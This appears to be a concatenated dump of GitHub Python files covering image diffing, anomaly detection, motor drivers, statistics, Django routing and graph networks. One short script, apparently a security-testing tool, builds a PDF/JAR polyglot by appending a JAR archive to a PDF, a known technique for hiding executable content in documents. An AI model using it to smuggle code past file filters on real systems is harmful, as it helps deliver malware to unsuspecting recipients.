beginning of the array. return the array. \n        # else, increment the digit by 1\n        # return the list\n        \n        \"\"\"\n        Add 1 to an array of digits as if it were a whole number\n        Given: [9, 9, 9, 9]\n        Output: [1, 0, 0, 0, 0]\n        \n        Given: [9, 9]\n        Output: [1, 0, 0]\n        \"\"\"\n        \n    ","repo_name":"stanjdev/SPD-1.4-coding-interview-questions","sub_path":"66_plus_one.py","file_name":"66_plus_one.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"39506021853","text":"import requests \n\nclass WatsonAPI:\n\tdef chunks(self, l, n):\n\t\tfor i in range(0, len(l), n):\n\t\t\tyield l[i:i + n]\n\n\tdef tone_analyzer(self, corpus):\n\t\turl = \"https://tone-analyzer-demo.mybluemix.net/api/tone\"\n\t\tresp = requests.post(url, data = {\"text\" : corpus})\n\t\tresponse = resp.json()\n\t\tresponse = response['document_tone']\n\t\treturn response\n\n\n\tdef personality_traits(self, corpus):\n\t\turl = \"https://personality-insights-livedemo.mybluemix.net/api/profile/text\"\n\t\tresp = requests.post(url, data = {\"text\" : corpus, \"language\": \"en\", \"source_type\":\"text\",\"accept_language\":\"en\",\"include_raw\":False})\n\t\tresponse = resp.json()\n\t\treturn response\n\n\n\tdef concepts(self, corpus):\n\t\turl = \"https://alchemy-language-demo.mybluemix.net/api/entities\"\n\t\tresp = requests.post(url, data = {\"text\" : corpus, \"sentiment\" : 1})\n\t\treturn resp.text","repo_name":"shivam5992/headline-feats","sub_path":"WatsonAPI.py","file_name":"WatsonAPI.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
{"seq_id":"12910056505","text":"import itertools\nimport StringIO\nfrom PIL import Image\n\n\ndef _AreTheSameSize(images):\n  \"\"\"Returns whether a set of images are the same size.\n\n  Args:\n    images: a list of images to compare.\n\n  Returns:\n    boolean.\n\n  Raises:\n    Exception: One image or fewer is passed in.\n  \"\"\"\n  if len(images) > 1:\n    return all(images[0].size == img.size for img in images[1:])\n  else:\n    raise Exception('Need at least two images to compare.')\n\n\ndef _GetDifferenceWithMask(image1, image2, mask=None,\n                           masked_color=(225, 225, 225, 255),\n                           same_color=(255, 255, 255, 255),\n                           different_color=(210, 0, 0, 255)):\n  \"\"\"Returns an image representing the difference between the two images.\n\n  This function computes the difference between two images taking into\n  account a mask if it is provided. The final three arguments represent\n  the coloration of the generated image.\n\n  Args:\n    image1: the first image to compare.\n    image2: the second image to compare.\n    mask: an optional mask image consisting of only black and white pixels\n      where white pixels indicate the portion of the image to be masked out.\n    masked_color: the color of a masked section in the resulting image.\n    same_color: the color of an unmasked section that is the same\n      between images 1 and 2 in the resulting image.\n    different_color: the color of an unmasked section that is different\n      between images 1 and 2 in the resulting image.\n\n  Returns:\n    A 2-tuple with an image representing the unmasked difference between the\n    two input images and the number of different pixels.\n\n  Raises:\n    Exception: if image1, image2, and mask are not the same size.\n  \"\"\"\n  image_mask = mask\n  if not mask:\n    image_mask = Image.new('RGBA', image1.size, (0, 0, 0, 255))\n  if not _AreTheSameSize([image1, image2, image_mask]):\n    raise Exception('images and mask must be the same size.')\n  image_diff = Image.new('RGBA', image1.size, (0, 0, 0, 255))\n  data = []\n  diff_pixels = 0\n  for m, px1, px2 in itertools.izip(image_mask.getdata(),\n                                    image1.getdata(),\n                                    image2.getdata()):\n    if m == (255, 255, 255, 255):\n      data.append(masked_color)\n    elif px1 == px2:\n      data.append(same_color)\n    else:\n      data.append(different_color)\n      diff_pixels += 1\n\n  image_diff.putdata(data)\n  return (image_diff, diff_pixels)\n\n\ndef CreateMask(images):\n  \"\"\"Computes a mask for a set of images.\n\n  Returns a difference mask that is computed from the images\n  which are passed in. 
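Each later image is compared against the first,\n  and the white pixels accumulate across the comparisons. 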
The mask will have a white pixel\n  anywhere that the input images differ and a black pixel\n  everywhere else.\n\n  Args:\n    images: list of images to compute the mask from.\n\n  Returns:\n    an image of only black and white pixels where white pixels represent\n    areas in the input images that have differences.\n\n  Raises:\n    Exception: if the images passed in are not of the same size.\n    Exception: if no images are passed in.\n  \"\"\"\n  if not images:\n    raise Exception('mask must be created from one or more images.')\n  mask = Image.new('RGBA', images[0].size, (0, 0, 0, 255))\n  image = images[0]\n  for other_image in images[1:]:\n    mask = _GetDifferenceWithMask(\n        image,\n        other_image,\n        mask,\n        masked_color=(255, 255, 255, 255),\n        same_color=(0, 0, 0, 255),\n        different_color=(255, 255, 255, 255))[0]\n  return mask\n\n\ndef AddMasks(masks):\n  \"\"\"Combines a list of mask images into one mask image.\n\n  Args:\n    masks: a list of mask-images.\n\n  Returns:\n    a new mask that represents the sum of the masked\n    regions of the passed in list of mask-images.\n\n  Raises:\n    Exception: if masks is an empty list, or if masks are not the same size.\n  \"\"\"\n  if not masks:\n    raise Exception('masks must be a list containing at least one image.')\n  if len(masks) > 1 and not _AreTheSameSize(masks):\n    raise Exception('masks in list must be of the same size.')\n  white = (255, 255, 255, 255)\n  black = (0, 0, 0, 255)\n  masks_data = [mask.getdata() for mask in masks]\n  image = Image.new('RGBA', masks[0].size, black)\n  image.putdata([white if white in px_set else black\n                 for px_set in itertools.izip(*masks_data)])\n  return image\n\n\ndef ConvertDiffToMask(diff):\n  \"\"\"Converts a Diff image into a Mask image.\n\n  Args:\n    diff: the diff image to convert.\n\n  Returns:\n    a new mask image where everything that was masked or different in the diff\n    is now masked.\n  \"\"\"\n  white = (255, 255, 255, 255)\n  black = (0, 0, 0, 255)\n  diff_data = diff.getdata()\n  image = Image.new('RGBA', diff.size, black)\n  image.putdata([black if px == white else white for px in diff_data])\n  return image\n\n\ndef VisualizeImageDifferences(image1, image2, mask=None):\n  \"\"\"Returns an image representing the unmasked differences between two images.\n\n  Iterates through the pixel values of two images and an optional\n  mask. With the default colors of _GetDifferenceWithMask, unmasked\n  matching pixels are rendered white, unmasked differing pixels red,\n  and masked pixels light grey.\n\n  Args:\n    image1: an RGB image\n    image2: another RGB image of the same size as image1.\n    mask: an optional RGB image consisting of only white and black pixels\n      where the white pixels represent the parts of the images to be masked\n      out.\n\n  Returns:\n    A 2-tuple with an image representing the unmasked difference between the\n    two input images and the number of different pixels.\n\n  Raises:\n    Exception: if the two images and optional mask are different sizes.\n  \"\"\"\n  return _GetDifferenceWithMask(image1, image2, mask)\n\n\ndef InflateMask(image, passes):\n  \"\"\"A function that adds layers of pixels around the white edges of a mask.\n\n  This function evaluates a 'frontier' of valid pixel indices. Initially,\n  this frontier contains all indices in the image. However, with each pass\n  only the pixels' indices which were added to the mask by inflation\n  are added to the next pass's frontier. 
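In effect each pass dilates the\n  white region of the mask by one pixel horizontally and vertically. 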
This gives the algorithm a\n  large upfront cost that scales negligibly when the number of passes\n  is increased.\n\n  Args:\n    image: the RGBA PIL.Image mask to inflate.\n    passes: the number of passes to inflate the image by.\n\n  Returns:\n    A RGBA PIL.Image.\n  \"\"\"\n  inflated = Image.new('RGBA', image.size)\n  new_dataset = list(image.getdata())\n  old_dataset = list(image.getdata())\n\n  frontier = set(range(len(old_dataset)))\n  new_frontier = set()\n\n  l = [-1, 1]\n\n  def _ShadeHorizontal(index, px):\n    col = index % image.size[0]\n    if px == (255, 255, 255, 255):\n      for x in l:\n        if 0 <= col + x < image.size[0]:\n          if old_dataset[index + x] != (255, 255, 255, 255):\n            new_frontier.add(index + x)\n          new_dataset[index + x] = (255, 255, 255, 255)\n\n  def _ShadeVertical(index, px):\n    row = index / image.size[0]\n    if px == (255, 255, 255, 255):\n      for x in l:\n        if 0 <= row + x < image.size[1]:\n          if old_dataset[index + image.size[0] * x] != (255, 255, 255, 255):\n            new_frontier.add(index + image.size[0] * x)\n          new_dataset[index + image.size[0] * x] = (255, 255, 255, 255)\n\n  for _ in range(passes):\n    for index in frontier:\n      _ShadeHorizontal(index, old_dataset[index])\n      _ShadeVertical(index, old_dataset[index])\n    # promote this pass's output to be the next pass's input; sharing the\n    # list is safe because passes only ever add white pixels\n    old_dataset = new_dataset\n    frontier, new_frontier = new_frontier, set()\n  inflated.putdata(new_dataset)\n  return inflated\n\n\ndef TotalDifferentPixels(image1, image2, mask=None):\n  \"\"\"Computes the number of different pixels between two images.\n\n  Args:\n    image1: the first RGB image to be compared.\n    image2: the second RGB image to be compared.\n    mask: an optional RGB image of only black and white pixels\n      where white pixels indicate the parts of the image to be masked out.\n\n  Returns:\n    the number of differing pixels between the images.\n\n  Raises:\n    Exception: if the images to be compared and the mask are not the same size.\n  \"\"\"\n  image_mask = mask\n  if not mask:\n    image_mask = Image.new('RGBA', image1.size, (0, 0, 0, 255))\n  if _AreTheSameSize([image1, image2, image_mask]):\n    total_diff = 0\n    for px1, px2, m in itertools.izip(image1.getdata(),\n                                      image2.getdata(),\n                                      image_mask.getdata()):\n      if m == (255, 255, 255, 255):\n        continue\n      elif px1 != px2:\n        total_diff += 1\n      else:\n        continue\n    return total_diff\n  else:\n    raise Exception('images and mask must be the same size')\n\n\ndef SameImage(image1, image2, mask=None):\n  \"\"\"Returns a boolean representing whether the images are the same.\n\n  Returns a boolean indicating whether two images are similar\n  enough to be considered the same. 
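Here similarity means zero unmasked\n  differing pixels. 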
Essentially wraps the\n  TotalDifferentPixels function.\n\n\n  Args:\n    image1: an RGB image to compare.\n    image2: an RGB image to compare.\n    mask: an optional image of only black and white pixels\n      where white pixels are masked out\n\n  Returns:\n    True if the images are similar, False otherwise.\n\n  Raises:\n    Exception: if the images (and mask) are different sizes.\n  \"\"\"\n  different_pixels = TotalDifferentPixels(image1, image2, mask)\n  return different_pixels == 0\n\n\ndef EncodePNG(image):\n  \"\"\"Returns the PNG file-contents of the image.\n\n  Args:\n    image: an RGB image to be encoded.\n\n  Returns:\n    the PNG-encoded contents of the image as a raw byte string.\n  \"\"\"\n  f = StringIO.StringIO()\n  image.save(f, 'PNG')\n  encoded_image = f.getvalue()\n  f.close()\n  return encoded_image\n\n\ndef DecodePNG(png):\n  \"\"\"Returns a RGB image from PNG file-contents.\n\n  Args:\n    png: PNG file-contents of an RGB image.\n\n  Returns:\n    an RGB image\n  \"\"\"\n  return Image.open(StringIO.StringIO(png))\n","repo_name":"kiwibrowser/src","sub_path":"chrome/test/ispy/common/image_tools.py","file_name":"image_tools.py","file_ext":"py","file_size_in_byte":9895,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"}
{"seq_id":"5875127981","text":"import numpy as np\nimport pandas as pd\nfrom donut import complete_timestamp, standardize_kpi\n\nimport os\nimport time\nimport sys\nimport importlib\nimportlib.reload(sys)\nfrom metric import best_f1,delay_f1\n# Read the raw data.\n\ndata_name = sys.argv[1]\n\n\n\ntrain_values = np.load(os.path.join('./data/','{}_train_value.npy'.format(data_name)))\nvalid_values = np.load(os.path.join('./data/','{}_valid_value.npy'.format(data_name)))\ntest_values = np.load(os.path.join('./data/','{}_test_value.npy'.format(data_name)))\n\ntrain_labels = np.load(os.path.join('./data/','{}_train_label.npy'.format(data_name)))\nvalid_labels = np.load(os.path.join('./data/','{}_valid_label.npy'.format(data_name)))\ntest_labels = np.load(os.path.join('./data/','{}_test_label.npy'.format(data_name)))\n\ntrain_missing = np.load(os.path.join('./data/','{}_train_missing.npy'.format(data_name)))\nvalid_missing = np.load(os.path.join('./data/','{}_valid_missing.npy'.format(data_name)))\ntest_missing = np.load(os.path.join('./data/','{}_test_missing.npy'.format(data_name)))\n\n\ntrain_exclude_ori = np.load(os.path.join('./data/','{}_train_exclude.npy'.format(data_name)))\nvalid_exclude_ori = np.load(os.path.join('./data/','{}_valid_exclude.npy'.format(data_name)))\ntest_exclude_ori = np.load(os.path.join('./data/','{}_test_exclude.npy'.format(data_name)))\ntrain_exclude = np.zeros_like(train_values,dtype=bool)\nfor i in train_exclude_ori:\n    train_exclude[int(i)]=True\nvalid_exclude = np.zeros_like(valid_values,dtype=bool)\nfor i in valid_exclude_ori:\n    valid_exclude[int(i)]=True\n\n\n# Standardize the training and testing data.\ntrain_values, mean, std = standardize_kpi(\n    train_values, excludes=train_missing)\nvalid_values, _, _ = standardize_kpi(valid_values, mean=mean, std=std)\ntest_values, _, _ = standardize_kpi(test_values, mean=mean, std=std)\n\nimport tensorflow as tf\nfrom donut import Donut\nfrom tensorflow import keras as K\nfrom tfsnippet.modules import Sequential\n\n# We build the entire model within the scope of `model_vs`,\n# it should hold exactly all the variables of `model`, including\n# the variables created by Keras layers.\nwith tf.variable_scope('model') as model_vs:\n    model = Donut(\n        h_for_p_x=Sequential([\n        
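# Two 100-unit ReLU layers with L2 regularization; this is the hidden\n            # network behind the reconstruction distribution p(x|z), and the\n            # q(z|x) network below mirrors the same architecture.\n        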
K.layers.Dense(100, kernel_regularizer=K.regularizers.l2(0.001),\n                           activation=tf.nn.relu),\n            K.layers.Dense(100, kernel_regularizer=K.regularizers.l2(0.001),\n                           activation=tf.nn.relu),\n        ]),\n        h_for_q_z=Sequential([\n            K.layers.Dense(100, kernel_regularizer=K.regularizers.l2(0.001),\n                           activation=tf.nn.relu),\n            K.layers.Dense(100, kernel_regularizer=K.regularizers.l2(0.001),\n                           activation=tf.nn.relu),\n        ]),\n        x_dims=120,\n        z_dims=5,\n    )\n\nfrom donut import DonutTrainer, DonutPredictor\n\ntrainer = DonutTrainer(model=model, model_vs=model_vs)\npredictor = DonutPredictor(model)\n\n\nwith tf.Session().as_default():\n    trainer.fit(train_values, train_labels, train_missing, mean, std,train_values=train_values,valid_values=valid_values,train_labels=train_labels,valid_labels=valid_labels,train_missing=train_missing,valid_missing=valid_missing,train_exclude=train_exclude,valid_exclude=valid_exclude)\n    time1 = time.time()\n    test_score = -predictor.get_score(test_values, test_missing)\n    time2 = time.time()\n    \n    print('test_time',time2-time1)\n    print(len(test_score))\n    print(len(test_labels))\n    #label = test_labels[119:]\n    mask = np.ones_like(test_labels,dtype=bool)\n    mask2 = np.ones_like(test_score,dtype=bool)\n    for i in test_exclude_ori:\n        mask[int(i)+1:int(i)+120]=False\n        mask2[int(i)+1-119:int(i)+120-119]=False\n    mask[:119]=False\n    label = test_labels[mask]\n    test_score = test_score[mask2]\n    print(len(label),len(test_score))\n    \n    kk=7\n    if sys.argv[1]=='Yahoo':\n        kk=3\n    elif sys.argv[1]=='NAB':\n        kk=150\n    max_f1,max_pre,max_recall,predict = best_f1(score=test_score,label=label)\n    d_f1,d_pre,d_recall,d_predict = delay_f1(score=test_score,label=label,k=kk)\n    with open('./all_result.txt','a') as f:\n        f.write('time: %f f1: %f %f %f %f %f %f\\n'%(time2-time1,max_f1,max_pre,max_recall,d_f1,d_pre,d_recall))","repo_name":"CyberOoops/donut","sub_path":"cpu_train_all.py","file_name":"cpu_train_all.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"15635760699","text":"__version__ = \"0.0.0-auto.0\"\n__repo__ = \"https://github.com/adafruit/Adafruit_CircuitPython_MotorKit.git\"\n\nimport board\nimport busio\nfrom adafruit_pca9685 import PCA9685\n\n\nclass MotorKit:\n    \"\"\"Class representing an Adafruit DC & Stepper Motor FeatherWing, Shield or Pi Hat kit.\n\n    Automatically uses the I2C bus on a Feather, Metro or Raspberry Pi.\"\"\"\n    def __init__(self, address=0x60):\n        self._motor1 = None\n        self._motor2 = None\n        self._motor3 = None\n        self._motor4 = None\n        self._stepper1 = None\n        self._stepper2 = None\n        i2c = busio.I2C(board.SCL, board.SDA)\n        self._pca = PCA9685(i2c, address=address)\n        self._pca.frequency = 1600\n\n    # We can save memory usage (~300 bytes) by deduplicating the construction of the objects for\n    # each motor. This saves both code size and the number of raw strings (the error message)\n    # stored. 
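Each DC motor uses one always-on enable channel plus two PWM\n    # throttle channels, so one shared helper covers all four motors. 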
The same technique is a net loss for stepper because there is less duplication.\n def _motor(self, motor_name, channels, stepper_name):\n from adafruit_motor import motor\n motor_name = \"_motor\" + str(motor_name)\n stepper_name = \"_stepper\" + str(stepper_name)\n if not getattr(self, motor_name):\n if getattr(self, stepper_name):\n raise RuntimeError(\n \"Cannot use {} at the same time as {}.\".format(motor_name[1:],\n stepper_name[1:]))\n self._pca.channels[channels[0]].duty_cycle = 0xffff\n setattr(self, motor_name, motor.DCMotor(self._pca.channels[channels[1]],\n self._pca.channels[channels[2]]))\n return getattr(self, motor_name)\n\n @property\n def motor1(self):\n return self._motor(1, (8, 9, 10), 1)\n\n @property\n def motor2(self):\n return self._motor(2, (13, 11, 12), 1)\n\n @property\n def motor3(self):\n return self._motor(3, (2, 3, 4), 2)\n\n @property\n def motor4(self):\n return self._motor(4, (7, 5, 6), 2)\n\n @property\n def stepper1(self):\n if not self._stepper1:\n from adafruit_motor import stepper\n if self._motor1 or self._motor2:\n raise RuntimeError(\"Cannot use stepper1 at the same time as motor1 or motor2.\")\n self._pca.channels[8].duty_cycle = 0xffff\n self._pca.channels[13].duty_cycle = 0xffff\n self._stepper1 = stepper.StepperMotor(self._pca.channels[10], self._pca.channels[9],\n self._pca.channels[11], self._pca.channels[12])\n return self._stepper1\n\n @property\n def stepper2(self):\n if not self._stepper2:\n from adafruit_motor import stepper\n if self._motor3 or self._motor4:\n raise RuntimeError(\"Cannot use stepper2 at the same time as motor3 or motor4.\")\n self._pca.channels[7].duty_cycle = 0xffff\n self._pca.channels[2].duty_cycle = 0xffff\n self._stepper2 = stepper.StepperMotor(self._pca.channels[4], self._pca.channels[3],\n self._pca.channels[5], self._pca.channels[6])\n return self._stepper2\n","repo_name":"Wolfjawan/S-R-P","sub_path":"adafruit_motorkit.py","file_name":"adafruit_motorkit.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39506021853","text":"import requests \n\nclass WatsonAPI:\n\tdef chunks(self, l, n):\n\t\tfor i in range(0, len(l), n):\n\t\t\tyield l[i:i + n]\n\n\tdef tone_analyzer(self, corpus):\n\t\turl = \"https://tone-analyzer-demo.mybluemix.net/api/tone\"\n\t\tresp = requests.post(url, data = {\"text\" : corpus})\n\t\tresponse = resp.json()\n\t\tresponse = response['document_tone']\n\t\treturn response\n\n\n\tdef personality_traits(self, corpus):\n\t\turl = \"https://personality-insights-livedemo.mybluemix.net/api/profile/text\"\n\t\tresp = requests.post(url, data = {\"text\" : corpus, \"language\": \"en\", \"source_type\":\"text\",\"accept_language\":\"en\",\"include_raw\":False})\n\t\tresponse = resp.json()\n\t\treturn response\n\n\n\tdef concepts(self, corpus):\n\t\turl = \"https://alchemy-language-demo.mybluemix.net/api/entities\"\n\t\tresp = requests.post(url, data = {\"text\" : corpus, \"sentiment\" : 1})\n\t\treturn resp.text","repo_name":"shivam5992/headline-feats","sub_path":"WatsonAPI.py","file_name":"WatsonAPI.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"31019322029","text":"# ============================*\n # ** Copyright UCAR (c) 2020\n # ** University Corporation for Atmospheric Research (UCAR)\n # ** National Center for Atmospheric Research (NCAR)\n # ** Research Applications Lab (RAL)\n # ** 
P.O.Box 3000, Boulder, Colorado, 80307-3000, USA\n # ============================*\n \n \n \n\"\"\"\nProgram Name: eclv_statistics.py\n\"\"\"\nfrom typing import Union\nimport warnings\nimport numpy as np\n\nfrom metcalcpy.util.ctc_statistics import calculate_economic_value\nfrom metcalcpy.util.utils import sum_column_data_by_name\n\n__author__ = 'Tatiana Burek'\n\n\ndef calculate_eclv(input_data: np.array, columns_names: np.array,\n thresh: Union[float, None], line_type: str, cl_pts: list, add_base_rate: int = 0) \\\n -> Union[dict, None]:\n \"\"\"Performs calculation of ECLV - The Economic Cost Loss Value\n\n Args:\n input_data: 2-dimensional numpy array with data for the calculation\n 1st dimension - the row of data frame\n 2nd dimension - the column of data frame\n columns_names: names of the columns for the 2nd dimension as Numpy array\n thresh: threshold value for 'pct' line type\n cl_pts: Cost loss ratio. The relative value of being unprepared\n and taking a loss to that of un-necessarily preparing. For example,\n cl = 0.1 indicates it would cost $ 1 to prevent a $10 loss.\n This defaults to the sequence 0.05 to 0.95 by 0.05.\n line_type: line type of the data 'ctc' or 'pct'\n add_base_rate: add Base rate point to cl or not (1 = add, 0 = don't add)\n\n Returns:\n Returns:\n If assigned to an object, the following values are reported in the dictionary :\n vmax - Maximum value\n V - Vector of values for each cl value\n F - Conditional false alarm rate.\n H - Conditional hit rate\n cl - Vector of cost loss ratios.\n s - Base rate\n or None if some of the data values are missing or invalid\n \"\"\"\n warnings.filterwarnings('error')\n\n # some validation\n if line_type != 'ctc' and line_type != 'pct':\n print(f'ERROR: incorrect line type {line_type} for calculating ECLV ')\n return None\n if line_type == 'pct' and thresh is None:\n print(f'ERROR: provide thresh for calculating ECLV ')\n return None\n\n try:\n if line_type == 'pct':\n index_thresh_i = np.where(columns_names == 'thresh_i')[0]\n index_oy_i = np.where(columns_names == 'oy_i')[0]\n index_on_i = np.where(columns_names == 'on_i')[0]\n thresh_i_more = input_data[:, index_thresh_i] > thresh\n thresh_i_less = input_data[:, index_thresh_i] <= thresh\n\n n11 = np.nansum(input_data[:, index_oy_i][thresh_i_more].astype(np.float))\n n10 = np.nansum(input_data[:, index_on_i][thresh_i_more].astype(np.float))\n n01 = np.nansum(input_data[:, index_oy_i][thresh_i_less].astype(np.float))\n n00 = np.nansum(input_data[:, index_on_i][thresh_i_less].astype(np.float))\n else:\n n11 = sum_column_data_by_name(input_data, columns_names, 'fy_oy')\n n10 = sum_column_data_by_name(input_data, columns_names, 'fy_on')\n n01 = sum_column_data_by_name(input_data, columns_names, 'fn_oy')\n n00 = sum_column_data_by_name(input_data, columns_names, 'fn_on')\n\n result = calculate_economic_value(np.array([n11, n10, n01, n00]), cl_pts, add_base_rate == 1)\n except (TypeError, ZeroDivisionError, Warning, ValueError):\n result = None\n warnings.filterwarnings('ignore')\n return result\n","repo_name":"dtcenter/METcalcpy","sub_path":"metcalcpy/util/eclv_statistics.py","file_name":"eclv_statistics.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"4476723501","text":"def countAndSay(n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n nums = [1]\n count = 1\n while (count < n):\n stack = []\n i = 0\n j = 1\n while (True):\n if j == len(nums):\n stack.extend([j - 
i, nums[i]])\n break\n elif nums[i] == nums[j]:\n j += 1\n else:\n stack.extend([j - i, nums[i]])\n i = j\n j = i + 1\n # print(\"stack : \",stack)\n nums = stack\n count += 1\n\n ans = ''.join(str(i) for i in nums)\n return ans\n\n\nn = 2\nfor i in range(n):\n ans = countAndSay(i)\n print(i, ans)\n","repo_name":"24rochak/LeetCode","sub_path":"Count and Say.py","file_name":"Count and Say.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7803938859","text":"from django.urls import path\n\nfrom . import views\nfrom django.conf import settings \nfrom django.conf.urls.static import static \n\n\nurlpatterns = [\n path('', views.intro, name='intro'),\n path('form/article/', views.get_article, name='get_article'),\n path('match/', views.match, name='match'),\n path('match//live_info/',views.info,name='info'),\n # we cant put only intro here..we have to put intro/ \n # path('intro/', views.intro, name='intro'),\n path('match/', views.match_detail, name='match_detail'),\n path('form/player/', views.get_player, name='get_player'),\n path('form/nation/', views.get_nation, name='get_nation'),\n path('form/ball/', views.get_ball, name='get_ball'),\n path('form/schedule/', views.get_sched, name='get_sched'),\n path('Latest_news/', views.index_news, name='index_news'),\n path('search_news', views.search_news, name='search_news'),\n path('player/', views.player_detail, name='player_detail'),\n path('Latest_news//', views.detail, name='detail'),\n path('get_News/', views.get_News, name='get_News'),\n path('get_player_detail/', views.get_player_detail, name='get_player_detail'),\n \n path('player/', views.player , name='player'),\n path('nation/', views.nation , name='nation'),\n # path('', views.news, name='news'),\n \n]+static(settings.MEDIA_URL ,document_root=settings.MEDIA_ROOT)\n\n # path('search', views.search , name='search'),\n # path('index_news/', views.news , name='news'),\n # , \n # path('player//', views.player_detail, name='player_detail'),\n # path('match/', views.match_index , name='match_index')","repo_name":"Shubham866/Django_cricket_website","sub_path":"blogs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34809567088","text":"import torch.nn as nn\n\nfrom graphgallery.nn.layers.pytorch import ChebConv, Sequential, activations\n\n\nclass ChebyNet(nn.Module):\n def __init__(self,\n in_features,\n out_features,\n *,\n hids=[16],\n acts=['relu'],\n dropout=0.5,\n K=2,\n bias=False):\n\n super().__init__()\n conv = []\n conv.append(nn.Dropout(dropout))\n for hid, act in zip(hids, acts):\n conv.append(ChebConv(in_features,\n hid, K=K,\n bias=bias))\n conv.append(activations.get(act))\n conv.append(nn.Dropout(dropout))\n in_features = hid\n conv.append(ChebConv(in_features, out_features, K=K, bias=bias))\n conv = Sequential(*conv)\n\n self.conv = conv\n self.reg_paras = conv[1].parameters()\n self.non_reg_paras = conv[2:].parameters()\n\n def forward(self, x, *adj):\n return self.conv(x, *adj)\n","repo_name":"EdisonLeeeee/GraphGallery","sub_path":"graphgallery/nn/models/pytorch/chebynet.py","file_name":"chebynet.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":450,"dataset":"github-code","pt":"52"} +{"seq_id":"41565840851","text":"import argparse\n\nparser = argparse.ArgumentParser(description='Create 
a new pdf file containing the pdf file and the jar file.')\nparser.add_argument('pdffile', help='The pdf file to use.')\nparser.add_argument('jarfile', help='The jar file to hide.')\nargs = parser.parse_args()\n\npdf_file = open(args.pdffile, 'rb')\npdf_data = pdf_file.read()\npdf_file.close()\n\njar_file = open(args.jarfile, 'rb')\njar_data = jar_file.read()\njar_file.close()\n\nnew_file = open('new-file-from-pdf-jar.pdf', 'wb')\nnew_file.write(pdf_data)\nnew_file.write(jar_data)\nnew_file.close()","repo_name":"xamQrexii/gw-proxy-serverless","sub_path":"security/polyglot/polyglotpdftojar.py","file_name":"polyglotpdftojar.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"26915939630","text":"try:\n from markdown import markdown\nexcept ImportError:\n markdown = lambda v: v\n\nclass TSFunction(object):\n def __init__(self, name, args):\n self.name = name\n self.args = args\n self.type = ''\n self.desc = ''\n\n self.fields = []\n self.see = []\n\n self.set_name_parts()\n\n self.private = self.infer_private()\n self.deprecated = False\n self.in_class = False\n\n self.mult = False\n self.abstract = False\n self.described_args = False\n\n self.code = None\n self.line = None\n\n def infer_private(self):\n auto = ('onadd', 'onremove')\n return self.basename.startswith('_') or self.basename.lower() in auto\n\n def set_name_parts(self):\n split = self.name.split('::')\n\n self.basename = split[-1]\n self.scopename = split[0] if len(split) == 2 else ''\n\n def format(self):\n keys = ('name', 'basename', 'scopename', 'type', 'mult',\n 'private', 'deprecated', 'in_class', 'described_args',\n 'code', 'line', 'see'\n )\n\n data = {\n 'desc': markdown(self.desc.decode('utf8')),\n 'args': []\n }\n\n for key in keys:\n data[key] = getattr(self, key)\n\n for arg in self.args:\n if hasattr(arg, 'desc'):\n arg['desc'] = markdown(arg['desc'].decode('utf8'))\n\n data['args'].append(arg)\n\n return data\n\nclass TSClass(object):\n def __init__(self, name, args):\n self.name = name\n self.args = args\n self.desc = ''\n\n self.fields = []\n self.see = []\n\n self.private = self.infer_private()\n self.deprecated = False\n self.abstract = False\n self.described_args = False\n\n self.code = None\n self.line = None\n\n self.methods = []\n\n def infer_private(self):\n return self.name.startswith('_')\n\n def add_method(self, function):\n if function.in_class:\n raise ValueError()\n\n function.in_class = True\n self.methods.append(function)\n\n def format(self):\n keys = ('name', 'private', 'deprecated', 'described_args', 'code', 'line', 'see', 'abstract')\n\n data = {\n 'methods': [v.format() for v in self.methods],\n 'desc': markdown(self.desc.decode('utf8')),\n 'args': [],\n 'fields': []\n }\n\n for key in keys:\n data[key] = getattr(self, key)\n\n for arg in self.args:\n if 'desc' in arg:\n arg['desc'] = markdown(arg['desc'].decode('utf8'))\n\n data['args'].append(arg)\n\n for field in self.fields:\n field['desc'] = markdown(field['desc'].decode('utf8'))\n data['fields'].append(field)\n\n return data\n\n @classmethod\n def from_constructor(cls, function):\n ins = cls(function.name, function.args)\n keys = ('desc', 'see', 'private', 'deprecated', 'described_args', 'code', 'line', 'abstract', 'fields')\n\n for key in keys:\n setattr(ins, key, getattr(function, key))\n\n return 
